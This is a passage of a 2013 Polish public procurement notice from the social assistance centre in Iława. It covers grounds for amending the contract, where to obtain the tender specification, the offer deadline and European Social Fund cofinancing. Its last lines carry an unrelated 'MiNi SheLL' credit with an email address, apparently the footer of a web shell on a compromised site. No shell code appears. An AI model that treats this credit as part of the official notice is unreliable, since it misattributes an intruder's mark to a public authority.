d) harmonogramu przeprowadzonych zajęć lub godzin zajęć w ciągu dnia, w przypadku, kiedy wykładowca przewidziany do realizacji danego modułu ze względów zdrowotnych, rodzinnych lub zawodowych nie może przeprowadzić zajęć w danym terminie,
e) kadry dydaktycznej, w przypadku, kiedy wykładowca przewidziany do realizacji danego modułu z przyczyn nie leżących po stronie wykonawcy nie może kontynuować zlecenia 
f) zmiany preferencji uczestników lub uczestniczek kursu i przekierowanie do innej grupy na jego prośbę
g) zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą należy rozumieć zdarzenie zewnętrzne wobec łączącej strony więzi prawnej: o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, którego nie można uniknąć, ani któremu nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków 
atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.
h) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron
i) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
j) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy oraz terminy wynikające z harmonogramu
k) gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami, albo groziłoby wykonawcy rażącą stratą w rozumieniu art. 357 Kodeksu Cywilnego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Iławie, ul. Grunwaldzka 6a, 14-200 Iława.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2013 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Iławie, ul. Grunwaldzka 6a, 14-200 Iława
I piętro, sekretariat, pokój nr 113.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 7.1.1., tytuł projektu Masz Okazję - Pomóż Sobie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com